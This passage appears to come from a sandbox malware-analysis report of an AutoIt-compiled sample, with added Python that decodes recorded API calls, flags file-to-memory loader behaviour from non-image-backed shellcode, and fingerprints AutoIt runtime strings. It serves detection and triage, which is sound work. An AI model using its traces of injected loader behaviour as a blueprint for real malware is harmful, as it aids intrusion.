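def flags(value: int, table: Dict[int, str]) -> str:
    """Render a bit mask with the names in table; unknown bits stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


def parse_slots(raw: Optional[str]) -> List[Optional[int]]:
    """Captured argument list -> ints; '?' (not recovered) and string literals become None."""
    if not raw:
        return []
    slots: List[Optional[int]] = []
    for tok in raw.split(","):
        try:
            slots.append(int(tok.strip(), 16))
        except ValueError:
            slots.append(None)
    return slots


def decode_createfile(slots: List[Optional[int]]) -> Optional[Dict[str, str]]:
    """Match the 7-parameter CreateFileW prototype against the captured stack window.
    Assumption: the capture lists raw stack slots, so the parameters may start one or
    more slots in; take the first window whose access/share/disposition are plausible."""
    for off in range(max(0, len(slots) - 6)):
        _name, access, share, _sec, disp, attr, _tmpl = slots[off:off + 7]
        if None in (access, share, disp, attr):
            continue
        if access & 0xF0000000 and share <= 7 and disp in DISPOSITION:
            return {"access": flags(access, GENERIC), "share": flags(share, SHARE),
                    "disposition": DISPOSITION[disp], "attributes": flags(attr, ATTRIB)}
    return None


def decode_virtualfree(slots: List[Optional[int]]) -> Optional[Dict[str, str]]:
    """VirtualFree(lpAddress, dwSize, dwFreeType); MEM_RELEASE requires dwSize == 0."""
    for off in range(max(0, len(slots) - 2)):
        addr, size, kind = slots[off:off + 3]
        if kind in FREE and (kind != 0x8000 or size == 0):
            return {"address": "?" if addr is None else hex(addr), "free_type": FREE[kind]}
    return None


@dataclass
class FunctionSummary:
    calls: List[Dict[str, object]] = field(default_factory=list)
    base: Optional[str] = None
    pe_backed: Optional[bool] = None


DECODERS = {"CreateFileW": decode_createfile, "VirtualFree": decode_virtualfree}


def parse_block(text: str) -> FunctionSummary:
    """Parse the APIs and Memory Dump Source lines of one function block."""
    summary = FunctionSummary()
    for line in text.splitlines():
        m = API_RE.search(line)
        if m:
            decoder = DECODERS.get(m.group("api"))
            summary.calls.append({
                "api": m.group("api"), "module": m.group("module"), "ref": m.group("ref"),
                "subcall": "Part of subcall" in line,
                "decoded": decoder(parse_slots(m.group("args"))) if decoder else None,
            })
            continue
        m = SRC_RE.search(line)
        if m:
            summary.base, summary.pe_backed = m.group("base"), m.group("pe") == "true"
    return summary


def is_file_to_memory_loader(graph_calls: List[str], summary: FunctionSummary) -> bool:
    """Open-for-read, allocate, read in that order, from code that is not image-backed."""
    want, pos = ["CreateFileW", "VirtualAlloc", "ReadFile"], 0
    for name in graph_calls:
        if pos < len(want) and name == want[pos]:
            pos += 1
    opens_for_read = any(c["api"] == "CreateFileW" and c["decoded"]
                         and "GENERIC_READ" in c["decoded"]["access"] for c in summary.calls)
    return pos == len(want) and opens_for_read and summary.pe_backed is False


if __name__ == "__main__":
    for label, text, graph in (("00112650", SAMPLE_SHELLCODE, SHELLCODE_GRAPH), ("00BE065B", SAMPLE_CRT, CRT_GRAPH)):
        s = parse_block(text)
        print(label, "PE-backed:", s.pe_backed, "loader:", is_file_to_memory_loader(graph, s))
        for c in s.calls:
            print("  ", c["api"], c["decoded"] or "")
```

The provenance check is the part that matters for triage: the AutoIt runtime's own CRT code at 00BE065B and 00BD8D45 calls CreateFileW and ReadFile as well, but from the image-backed region at 00BA0000, so the same API shape in a "based on PE: false" region is what separates injected loader code from the host's library routines.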

                                                                      Control-flow Graph

                                                                      • Graph image not captured in this export. Single basic block ba2c63-ba2cd3 calling CreateWindowExW twice and ShowWindow twice.
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: e08e79312e522d4f92d1a19ae9dda4c1b07f8d77cd68cb702dbfefb17566e9ed
                                                                      • Instruction ID: a48c3de1440006b2c8658a92cfc95de2b1ba6c8dbf49228059e5364e3d3a646d
                                                                      • Opcode Fuzzy Hash: e08e79312e522d4f92d1a19ae9dda4c1b07f8d77cd68cb702dbfefb17566e9ed
                                                                      • Instruction Fuzzy Hash: CEF0B7755503907AEB211B2BAC49F7F2EBDD7C6F50F05405AFD08A25B0C6615890DAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
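The runtime functions above register a window class named "AutoIt v3", create windows of that class and an "edit" control, and look up the include directory under Software\AutoIt v3\AutoIt, which is how the report fingerprints the dropped binary as an AutoIt runtime. The Python below is an added example, not code from Joe Sandbox or from AutoIt: it scans a binary for those recovered strings (UTF-16LE first, since the runtime uses the W-suffixed APIs, then ASCII), discards a hit that only lies inside a longer marker's hit, and treats TaskbarCreated as a weak supporting marker. The sample buffer, its filler bytes and the offsets are constructed for the example.

```python
"""Fingerprint a binary as an AutoIt-compiled executable from runtime strings.

Added example; not code from Joe Sandbox or from AutoIt. The marker strings are
the ones the report recovered from the runtime functions above; the sample
buffer is constructed here and stands in for a dropped file.
"""
from typing import Dict, List, Tuple

# Markers recovered in this report: the registry path the runtime reads for its
# include directory, the window class it registers, and the broadcast message it
# registers. TaskbarCreated is generic Win32 and only supports the other two.
AUTOIT_MARKERS = ["Software\\AutoIt v3\\AutoIt", "AutoIt v3", "TaskbarCreated"]
WEAK_MARKERS = {"TaskbarCreated"}


def encodings(marker: str) -> List[Tuple[str, bytes]]:
    """The runtime uses the W-suffixed APIs, so strings normally sit as UTF-16LE;
    ASCII is scanned too so a narrow copy of a marker is not missed."""
    return [("utf-16le", marker.encode("utf-16-le")), ("ascii", marker.encode("ascii"))]


def find_markers(data: bytes) -> Dict[str, List[Tuple[str, int]]]:
    """Every marker hit as (encoding, offset), dropping a hit that only lies inside
    a longer marker's hit (e.g. 'AutoIt v3' inside the registry path)."""
    raw: List[Tuple[str, str, int, int]] = []
    for marker in AUTOIT_MARKERS:
        for enc, needle in encodings(marker):
            start = 0
            while (idx := data.find(needle, start)) >= 0:
                raw.append((marker, enc, idx, idx + len(needle)))
                start = idx + 1
    hits: Dict[str, List[Tuple[str, int]]] = {}
    for marker, enc, s, e in raw:
        nested = any(m2 != marker and s >= s2 and e <= e2 for m2, _, s2, e2 in raw)
        if not nested:
            hits.setdefault(marker, []).append((enc, s))
    return hits


def is_autoit_compiled(data: bytes) -> bool:
    """Require two distinct strong markers; a lone generic string is not evidence."""
    strong = [m for m in find_markers(data) if m not in WEAK_MARKERS]
    return len(strong) >= 2


def build_sample() -> bytes:
    """Constructed stand-in for a dropped runtime: 1024 bytes of filler between markers."""
    filler = bytes(range(256)) * 4
    return (filler + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le")
            + filler + "AutoIt v3".encode("utf-16-le")
            + filler + b"TaskbarCreated" + filler)


if __name__ == "__main__":
    sample = build_sample()
    for marker, where in find_markers(sample).items():
        print(f"{marker!r}: {where}")
    print("AutoIt-compiled:", is_autoit_compiled(sample))
```

On a real dropped file, `is_autoit_compiled(open(path, "rb").read())` answers only whether the file carries the AutoIt runtime; the embedded script that the runtime interprets is a separate artifact and still has to be extracted and read to see what the sample actually does.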

                                                                      Control-flow Graph

                                                                      • Graph image not captured in this export. Basic blocks span bd61fe-bd6419. Win32 calls on the graph: MultiByteToWideChar (twice), WideCharToMultiByte. Internal calls: bdfe21, bc0a8c, be2040, bd3820, bd3467, bd1537.
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BC82D9,00BC82D9,?,?,?,00BD644F,00000001,00000001,8BE85006), ref: 00BD6258
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BD644F,00000001,00000001,8BE85006,?,?,?), ref: 00BD62DE
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD63D8
                                                                      • __freea.LIBCMT ref: 00BD63E5
                                                                        • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      • __freea.LIBCMT ref: 00BD63EE
                                                                      • __freea.LIBCMT ref: 00BD6413
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: 24f3f6e2a8dcc2e8b8ffe5c417352a57060319068abb08079c98cb7a166dc64f
                                                                      • Instruction ID: 02be3f281eb55d4ce54846e5576871e998d23ef11b2ef2c7634a17ac24a465c1
                                                                      • Opcode Fuzzy Hash: 24f3f6e2a8dcc2e8b8ffe5c417352a57060319068abb08079c98cb7a166dc64f
                                                                      • Instruction Fuzzy Hash: 5F51D172A00216ABDB258F68DC81FAFB7E9EB44720F1546AAFC05D6241FB34DC44D664
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA1BF4
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA1BFC
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA1C07
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA1C12
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA1C1A
                                                                        • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA1C22
                                                                        • Part of subcall function 00BA1B4A: RegisterWindowMessageW.USER32(00000004,?,00BA12C4), ref: 00BA1BA2
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BA136A
                                                                      • OleInitialize.OLE32 ref: 00BA1388
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00BE24AB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: 0`$PQ
                                                                      • API String ID: 1986988660-2589806630
                                                                      • Opcode ID: a73ad17772599971c84addfbf37854dc84273812ba7c463fdd01a7f40b64d0de
                                                                      • Instruction ID: 2cac8da65eb89a586f56828bafc3c1507a904ce9666d110ab220d230a23cbbd1
                                                                      • Opcode Fuzzy Hash: a73ad17772599971c84addfbf37854dc84273812ba7c463fdd01a7f40b64d0de
                                                                      • Instruction Fuzzy Hash: A271AAB49253408ECBC8EF7DA88675D3AE4FB8935475D866AEC0ED72A1EB304484CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (legend: Executed / Not Executed; rendered graph not available, node and edge list follows)

                                                                      control_flow_graph 893 112410-11254f call 110000 call 112300 CreateFileW 900 112551 893->900 901 112556-112566 893->901 902 112606-11260b 900->902 904 112568 901->904 905 11256d-112587 VirtualAlloc 901->905 904->902 906 112589 905->906 907 11258b-1125a2 ReadFile 905->907 906->902 908 1125a4 907->908 909 1125a6-1125e0 call 112340 call 111300 907->909 908->902 914 1125e2-1125f7 call 112390 909->914 915 1125fc-112604 ExitProcess 909->915 914->915 915->902
                                                                      APIs
                                                                        • Part of subcall function 00112300: Sleep.KERNELBASE(000001F4), ref: 00112311
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00112545
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: 49T162P2GOOE5STNI9C08CIABB6L5I
                                                                      • API String ID: 2694422964-1706107533
                                                                      • Opcode ID: f33ae436302edade2c2f5e62e3ea122bf7bfad632a8b621af2e3e5f3bd20854f
                                                                      • Instruction ID: dbc64782969a37c2c0247f2aa44b35296256cfdade502177a97d71a62a2266e0
                                                                      • Opcode Fuzzy Hash: f33ae436302edade2c2f5e62e3ea122bf7bfad632a8b621af2e3e5f3bd20854f
                                                                      • Instruction Fuzzy Hash: 3E619530D04288DAEF16DBF4C854BDEBBB96F15304F044199E6447B2C1C7B90B88CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable must be of type 'Object'.$hk
                                                                      • API String ID: 0-3564439943
                                                                      • Opcode ID: 31f6c99b8712994aabc89df9728a35b24e19310f8e100c967a286c8201a4a6f5
                                                                      • Instruction ID: 382387238894c04fe7f9a963349100f74c9b6c0fee14a15923caecc386f0806f
                                                                      • Opcode Fuzzy Hash: 31f6c99b8712994aabc89df9728a35b24e19310f8e100c967a286c8201a4a6f5
                                                                      • Instruction Fuzzy Hash: 70C28A70A04215CFCB24CF58C880AADB7F1FF4A710F2485A9E926AB391D775ED85CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (legend: Executed / Not Executed; rendered graph not available, node and edge list follows)

                                                                      control_flow_graph 1427 c12947-c129b9 call be1f50 call c125d6 call bbfe0b call ba5722 call c1274e call ba511f call bc5232 1442 c12a6c-c12a73 call c12e66 1427->1442 1443 c129bf-c129c6 call c12e66 1427->1443 1448 c12a75-c12a77 1442->1448 1449 c12a7c 1442->1449 1443->1448 1450 c129cc-c12a6a call bcd583 call bc4983 call bc9038 call bcd583 call bc9038 * 2 1443->1450 1451 c12cb6-c12cb7 1448->1451 1453 c12a7f-c12b3a call ba50f5 * 8 call c13017 call bce5eb 1449->1453 1450->1453 1454 c12cd5-c12cdb 1451->1454 1492 c12b43-c12b5e call c12792 1453->1492 1493 c12b3c-c12b3e 1453->1493 1457 c12cf0-c12cf6 1454->1457 1458 c12cdd-c12ced call bbfdcd call bbfe14 1454->1458 1458->1457 1496 c12bf0-c12bfc call bce678 1492->1496 1497 c12b64-c12b6c 1492->1497 1493->1451 1504 c12c12-c12c16 1496->1504 1505 c12bfe-c12c0d DeleteFileW 1496->1505 1498 c12b74 1497->1498 1499 c12b6e-c12b72 1497->1499 1501 c12b79-c12b97 call ba50f5 1498->1501 1499->1501 1511 c12bc1-c12bd7 call c1211d call bcdbb3 1501->1511 1512 c12b99-c12b9e 1501->1512 1507 c12c91-c12ca5 CopyFileW 1504->1507 1508 c12c18-c12c7e call c125d6 call bcd2eb * 2 call c122ce 1504->1508 1505->1451 1509 c12ca7-c12cb4 DeleteFileW 1507->1509 1510 c12cb9-c12ccf DeleteFileW call c12fd8 1507->1510 1508->1510 1532 c12c80-c12c8f DeleteFileW 1508->1532 1509->1451 1519 c12cd4 1510->1519 1526 c12bdc-c12be7 1511->1526 1516 c12ba1-c12bb4 call c128d2 1512->1516 1527 c12bb6-c12bbf 1516->1527 1519->1454 1526->1497 1529 c12bed 1526->1529 1527->1511 1529->1496 1532->1451
                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12C05
                                                                      • DeleteFileW.KERNEL32(?), ref: 00C12C87
                                                                      • CopyFileW.KERNEL32 ref: 00C12C9D
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12CAE
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12CC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$Copy
                                                                      • String ID:
                                                                      • API String ID: 3226157194-0
                                                                      • Opcode ID: 02aaab5e85b41277e07e8bdb0b0f3f93fb49352c85bad9cbdab24a67051d9844
                                                                      • Instruction ID: bd187421c508937b840c64f8433b0d8881b8d8373cfcb53ef35fcc95b7bbad11
                                                                      • Opcode Fuzzy Hash: 02aaab5e85b41277e07e8bdb0b0f3f93fb49352c85bad9cbdab24a67051d9844
                                                                      • Instruction Fuzzy Hash: 6FB16F75D00119ABDF21DBA4CC85EEEB7BDEF09350F1040AAF609E6141EB309B949FA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00BD8704
                                                                      • GetLastError.KERNEL32(?,00BD85CC,?,00C68CC8,0000000C), ref: 00BD870E
                                                                      • __dosmaperr.LIBCMT ref: 00BD8739
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                      • String ID: P,
                                                                      • API String ID: 2583163307-1625735819
                                                                      • Opcode ID: 89274544c349577dc0f5524533d1585e817b10497afe6766ae7ea02fd9c4c34d
                                                                      • Instruction ID: ec4793a7e545bc96244883514d40a2ac4c2e1ce305a0253b7fc102a5f01456f4
                                                                      • Opcode Fuzzy Hash: 89274544c349577dc0f5524533d1585e817b10497afe6766ae7ea02fd9c4c34d
                                                                      • Instruction Fuzzy Hash: DB018E3660566026D27467346885B7EEBC9CB81776F3901DBF8199B3D2FEA0CC818254
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32 ref: 00BA3B40
                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00BA3B61
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BA3B83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: 49caf1a63d93ec09161174a6d7f9b2ec332523609fdd5cfde451a54102b63123
                                                                      • Instruction ID: 0c6927233e4692cb64434c16aa44e2443da6f074418bf5b0aeb08b64548914fc
                                                                      • Opcode Fuzzy Hash: 49caf1a63d93ec09161174a6d7f9b2ec332523609fdd5cfde451a54102b63123
                                                                      • Instruction Fuzzy Hash: A5112AB5525208FFDB208FA5DC85AAEB7F9EF05B44B504499B805E7110D3319E4097A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00BA13C6,00000000,00000000,?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue), ref: 00BD30A5
                                                                      • GetLastError.KERNEL32(?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000,00000364,?,00BD2E46), ref: 00BD30B1
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000), ref: 00BD30BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: e0ad2d46bc3e34f75249ba683c5bbc7a48e81dc130e8aa59de783ca87c37d832
                                                                      • Instruction ID: 3844657a976c7a76db754bd295f8195f292a9e4745068593cc076d5609913e0d
                                                                      • Opcode Fuzzy Hash: e0ad2d46bc3e34f75249ba683c5bbc7a48e81dc130e8aa59de783ca87c37d832
                                                                      • Instruction Fuzzy Hash: 7701D436311222ABCB214A78AC84B5FBBD8EF05F61B240662F909F3242E721D901C7E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0668
                                                                        • Part of subcall function 00BC32A4: RaiseException.KERNEL32(?,?,?,00BC068A,?,00C71444,?,?,?,?,?,?,00BC068A,00BA1129,00C68738,00BA1129), ref: 00BC3304
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0685
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3476068407-410509341
                                                                      • Opcode ID: 27830cf8d18001f4028d5a76c9b6e9515578cf62467896d70aac20cf7f36ceed
                                                                      • Instruction ID: 806fa79cd8fadffe371e95eaee117b274694158504e1a5519fda6ae4af080b0d
                                                                      • Opcode Fuzzy Hash: 27830cf8d18001f4028d5a76c9b6e9515578cf62467896d70aac20cf7f36ceed
                                                                      • Instruction Fuzzy Hash: 65F0FC3490020DF7CF10BA64DC86EAD77EC9E00710B6045F9B924D5591EF71DB5AC6D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00C1302F
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C13044
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
